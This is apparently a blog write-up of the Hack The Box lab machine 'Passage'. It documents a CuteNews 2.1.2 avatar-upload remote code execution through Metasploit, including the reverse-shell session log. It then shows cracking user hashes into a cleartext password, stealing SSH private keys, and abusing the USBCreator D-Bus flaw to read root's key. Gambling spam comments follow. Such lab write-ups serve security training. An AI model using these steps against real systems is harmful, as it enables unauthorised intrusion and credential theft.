• OS: Linux
  • Difficulty: Medium
  • Points: 30
  • Release: 05 Sep 2020
  • IP:

Bloods claimed on Passage

User Blood: qtc 00 days, 00 hours, 19 mins, 35 seconds.

Root Blood: Lemming 00 days, 00 hours, 32 mins, 04 seconds.


| nmap

So, I start as default, with nmap.

[email protected]:~/Desktop/HTB/passage$ nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000

A few seconds later I get a report:

Not so much, but enought. Let’s research port 80.

Making host entries:


| web

By footer it define as CuteNews CMS. Second, we see that I can’t fuzz url, because fail2ban.

Walking through the site, we find logging page and that the site is running CuteNews version 2.1.2.

Register here, and lets look for some exploits by searchsploit:

[email protected]:~/Desktop/HTB/passage$ searchsploit cutenews 2.1.2

and found


| cutenews-rce

As I can see in Personal options, we have possibility to upload avatar for my profile:

So, will try exploit “CuteNews 2.1.2 – ‘avatar’ Remote Code Execution”. First, we need find root directory of msf:

locate metasploit | grep "multi/"

So, go to /usr/share/metasploit-framework/modules/exploits/multi/http/, and mirror the exploit in the directory:

searchsploit -m 46698

Rename this, for example:

sudo mv 46698.rb cutenews_212_rce.rb

Also, this script have error – no comma at the end of the line, need fix it:

['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],

Starting msfconsole in terminal, and configure:

msf5 > search cutenews
msf5 > use 0
msf5 exploit(multi/http/cutenews_212_rce) > set RHOSTS
msf5 exploit(multi/http/cutenews_212_rce) > set PASSWORD 123321!@#
msf5 exploit(multi/http/cutenews_212_rce) > set USERNAME user
msf5 exploit(multi/http/cutenews_212_rce) > run

Where I use my username and password. Not forget to check your LHOST 🙂

msf5 exploit(multi/http/cutenews_212_rce) > run

[*] Started reverse TCP handler on [] - CuteNews is 2.1.2
[+] Authentication was successful with user: user
[*] Trying to upload kgxhvyei.php
[+] Upload successfully.
[*] Sending stage (38288 bytes) to
[*] Meterpreter session 1 opened ( -> at 2020-09-16 23:43:29 -0400

meterpreter > shell
Process 2351 created.
Channel 0 created.

And do TTY: python -c "import pty; pty.spawn('/bin/bash')"

#privilege escalation

To simplify your tasks in the future, I will leave this hint here – click on image to preview

| user

Looking around, we see that machine has two users under the /home directory:
* Nadav
* Paul
And we can list the directory of Paul that contains user.txt file, but directory listing of Nadav isn’t allowed.

So, after more enumiration, I found file list with base64 in /var/www/html/CuteNews/cdata/users. Lets encode it:

for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done

Lets pay attention on lines:

hashid and Cyberchef said what it is sha256.

Decrypt this hashs with john: sudo john --format=Raw-SHA256 paul.hash

[email protected]:atlanta1

Here I get user.txt in console.

| user2

In ~/.ssh we can found private key id_rsa. I copy him on my pc, and did:

[email protected]:/tmp$ chmod 600 paul_id_rsa
[email protected]:/tmp$ ssh -i paul_id_rsa [email protected]

Btw, user nadav in the authorized_keys in .ssh. So nadav can ssh into user paul without password. Maybe paul can do that too:

ssh [email protected]

And have sucsess! 😉

| root

Here Im enumirated priveleged process:

find / -perm -u=s -type f 2>/dev/null

Among them is a sensitive program: dbus-daemon-launch-helper.

Google it – gdbus privilege escalation

Found – https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.

Get and use root id_rsa:

[email protected]:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

Last step – connect as root, and receive root.txt.


Last modified: 28.06.2021



bahis oyna 

I see something really interesting about your website so I saved to my bookmarks . Jess Merriam

kacak bahis siteleri 

Hi Dear, are you truly visiting this web site regularly, if so then you will definitely obtain good knowledge. Alfred Gafanha

Write a Reply or Comment

Your email address will not be published.